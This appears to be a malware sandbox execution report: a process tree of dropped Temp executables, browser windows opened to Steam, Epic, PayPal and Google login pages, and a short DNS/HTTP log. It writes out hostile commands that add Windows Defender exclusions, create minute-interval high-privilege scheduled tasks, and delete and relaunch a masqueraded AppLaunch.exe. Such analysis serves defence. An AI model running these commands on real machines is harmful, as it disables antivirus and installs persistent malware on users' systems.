    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,5332512126863478412,12452091746626313066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
        5⤵
        
        PID:6276
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5332512126863478412,12452091746626313066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        5⤵
        
        PID:6268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform
      4⤵
      PID:4724
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
        5⤵
        
        PID:4704
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,8875998355361364869,11768889426887770946,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
        5⤵
        
        PID:6420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8875998355361364869,11768889426887770946,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        5⤵
        
        PID:6388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
      4⤵
      PID:4852
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
        5⤵
        
        PID:5100
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
        5⤵
        
        PID:6900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
        5⤵
        
        PID:7316
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
        5⤵
        
        PID:7308
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
        5⤵
        
        PID:7416
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4376 /prefetch:1
        5⤵
        
        PID:7944
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
        5⤵
        
        PID:6404
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        5⤵
        
        PID:6380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
        5⤵
        
        PID:4596
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
        5⤵
        
        PID:6340
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
        5⤵
        
        PID:3760
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
        5⤵
        
        PID:6568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
        5⤵
        
        PID:7832
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
        5⤵
        
        PID:5324
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
        5⤵
        
        PID:7460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:1
        5⤵
        
        PID:7572
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1
        5⤵
        
        PID:1268
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1
        5⤵
        
        PID:5884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
        5⤵
        
        PID:7024
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7728 /prefetch:1
        5⤵
        
        PID:8092
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8280390550469440187,15289849197683863882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7700 /prefetch:1
        5⤵
        
        PID:5476
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
      4⤵
      PID:3436
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
        5⤵
        
        PID:4052
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,15582067763522101221,10727704258669313548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
        5⤵
        
        PID:6476
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,15582067763522101221,10727704258669313548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        5⤵
        
        PID:6468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
      4⤵
      PID:760
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
        5⤵
        
        PID:768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,9166030645100397952,13057127099944614822,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
        5⤵
        
        PID:6856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9166030645100397952,13057127099944614822,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        5⤵
        
        PID:6848
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:1412
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,13081570099667458573,2595849481537130917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
        5⤵
        
        PID:6728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,13081570099667458573,2595849481537130917,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
        5⤵
        
        PID:6716
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5qv9pR5.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5qv9pR5.exe
  2⤵
  PID:864
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4088

C:\Users\Admin\AppData\Local\Temp\9149.exe
C:\Users\Admin\AppData\Local\Temp\9149.exe
1⤵
- Executes dropped EXE
PID:956

C:\Users\Admin\AppData\Local\Temp\9504.exe
C:\Users\Admin\AppData\Local\Temp\9504.exe
1⤵
- Executes dropped EXE
PID:1608
- C:\Users\Admin\AppData\Local\Temp\9504.exe
  C:\Users\Admin\AppData\Local\Temp\9504.exe
  2⤵
  PID:5576

C:\Users\Admin\AppData\Local\Temp\CBC4.exe
C:\Users\Admin\AppData\Local\Temp\CBC4.exe
1⤵
- Executes dropped EXE
PID:2724
- C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  PID:2716
- C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
  2⤵
  PID:6092
- C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
  "C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
  2⤵
  PID:5640
- C:\Users\Admin\AppData\Local\Temp\latestX.exe
  "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
  2⤵
  PID:6552
- C:\Users\Admin\AppData\Local\Temp\tuc3.exe
  "C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
  2⤵
  PID:1716

C:\Users\Admin\AppData\Local\Temp\D971.exe
C:\Users\Admin\AppData\Local\Temp\D971.exe
1⤵
PID:1200
- C:\Users\Admin\AppData\Local\Temp\is-3UB9A.tmp\D971.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-3UB9A.tmp\D971.tmp" /SL5="$A01C4,3304892,54272,C:\Users\Admin\AppData\Local\Temp\D971.exe"
  2⤵
  PID:3376
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Query
    3⤵
    PID:5904
- - C:\Program Files (x86)\Common Files\VolumeUTIL\VolumeUTIL.exe
    "C:\Program Files (x86)\Common Files\VolumeUTIL\VolumeUTIL.exe" -i
    3⤵
    PID:5956
- - C:\Program Files (x86)\Common Files\VolumeUTIL\VolumeUTIL.exe
    "C:\Program Files (x86)\Common Files\VolumeUTIL\VolumeUTIL.exe" -s
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" helpmsg 29
    3⤵
    PID:5388
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 helpmsg 29
      4⤵
      PID:7908

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
1⤵
PID:4520

C:\Users\Admin\AppData\Local\Temp\DEC2.exe
C:\Users\Admin\AppData\Local\Temp\DEC2.exe
1⤵
PID:856

C:\Users\Admin\AppData\Local\Temp\E5C7.exe
C:\Users\Admin\AppData\Local\Temp\E5C7.exe
1⤵
PID:3152
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\E5C7.exe"
  2⤵
  PID:7636
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wabzaZXb.exe"
  2⤵
  PID:7164
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wabzaZXb" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9471.tmp"
  2⤵
  - Creates scheduled task(s)
  PID:6100
- C:\Users\Admin\AppData\Local\Temp\E5C7.exe
  "C:\Users\Admin\AppData\Local\Temp\E5C7.exe"
  2⤵
  PID:5680

C:\Users\Admin\AppData\Local\Temp\EB95.exe
C:\Users\Admin\AppData\Local\Temp\EB95.exe
1⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\FA2C.exe
C:\Users\Admin\AppData\Local\Temp\FA2C.exe
1⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\FFEA.exe
C:\Users\Admin\AppData\Local\Temp\FFEA.exe
1⤵
PID:1440
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:1312
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "AppLaunch" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\AppLaunch.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\AppLaunch.exe"
    3⤵
    PID:5712
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      PID:6112
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:6484

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
1⤵
PID:2676

C:\Users\Admin\AppData\Local\Temp\1A68.exe
C:\Users\Admin\AppData\Local\Temp\1A68.exe
1⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\is-MSVH7.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MSVH7.tmp\tuc3.tmp" /SL5="$1031C,3243561,76288,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
1⤵
PID:7184
- C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe
  "C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe" -i
  2⤵
  PID:7192
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /Query
  2⤵
  PID:60
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\system32\net.exe" helpmsg 28
  2⤵
  PID:5312
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 helpmsg 28
    3⤵
    PID:3800
- C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe
  "C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe" -s
  2⤵
  PID:6976

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:452

Network

DNS

75.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.159.190.20.in-addr.arpa

IN PTR

Response
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.a-0001.a-msedge.net

g-bing-com.a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
